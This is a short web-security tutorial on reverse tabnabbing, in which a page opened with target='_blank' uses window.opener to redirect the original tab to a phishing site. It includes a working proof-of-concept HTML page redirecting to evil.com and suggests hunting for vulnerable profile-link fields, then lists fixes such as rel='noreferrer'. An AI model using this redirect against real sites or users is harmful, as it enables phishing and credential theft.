Have you ever wondered that adding the attribute target="_blank"
in anchor tag can attract hackers to redirect your users to some malware website.
Tab nabbing is a smart hacking technique for phishing and scamming. Through this, attackers take advantage and control a victim's unattended browser tabs by hijacking and redirecting him to malicious URLs where they can perform a phishing attack and execute scripts etc.
What is Tab Nabbing?
When you open a link in a new tab (target="_blank"
), the page that opens in a new tab can access the initial tab and change it's location using the window.opener
property, hence opening some phishing or scam website which ruins the user experience and can lead to multiple security issues too.
Website's with profile pages where user is allowed to enter a URL for his/her personal website, maybe blog or social media profile links are susceptible to this hacking technique because mostly these links are shown on the pages in form of anchor tags with target="_blank"
attribute set so as to open the link in a new tab.
Trying out Tab Nabbing technique
To accomplish this, we need to create a webpage which has the code using the window.opener property set to access the initial tab when this webpage is opened in a new tab. So let's create a simple HTML webpage first,
<html>
<head>
<script> window.opener.location.replace("http://www.evil.com"); </script>
</head>
<body>
<script> alert("This is windows opener property bug, Check the parent tab, it should be replaced"); </script>
check you old tab
</body>
</html>
Upload the webpage on a server and your tab nabbing webpage is ready. All you need now is a vulnerable website. Studytonight had this issue in the profile section but we fixed it (Thanks to Vikas Srivastava, who reported this issue). You can explore around and look for websites which have profile pages where they allow users to store a URL and then show the URL as an anchor tag with target="_blank"
attribute set.
The JavaScript code which is responsible for nabbing the initial tab is window.opener.location.replace("http://www.evil.com");
, here you can change the URL to any URL of your choice wherever you want the initial tab to be redirected.
How to solve the Tab Nabbing issue?
Well, there are multiple ways to fix the issue, they are:
-
The most basic fix is, don't use the target="_blank"
attribute in anchor tags.
-
If you want to use target="_blank"
attribute in anchor tags then add another attribute rel="noreferrer"
which disables the referrer access to the initial tab. This fix is a simple solution to end the problem of Tab nabbing for any website developer.
-
Set the window.opener
attribute to null on the new tab before redirecting to it, like this:
var w = window.open(url, "target=_blank");
w.opener = null;
Conclusion
This is a small issue but can lead to big impact on user experience as user will get redirected to some phishing website which may try to access browser data of user or may ask for some user credentials. Hacker can even design a webpage similar to your website's page, show the login page and ask the user to login again because session has expired. And unknowingly the user will enter the username and password which will be stored by the hacker for accessing the user's account.
You may also like: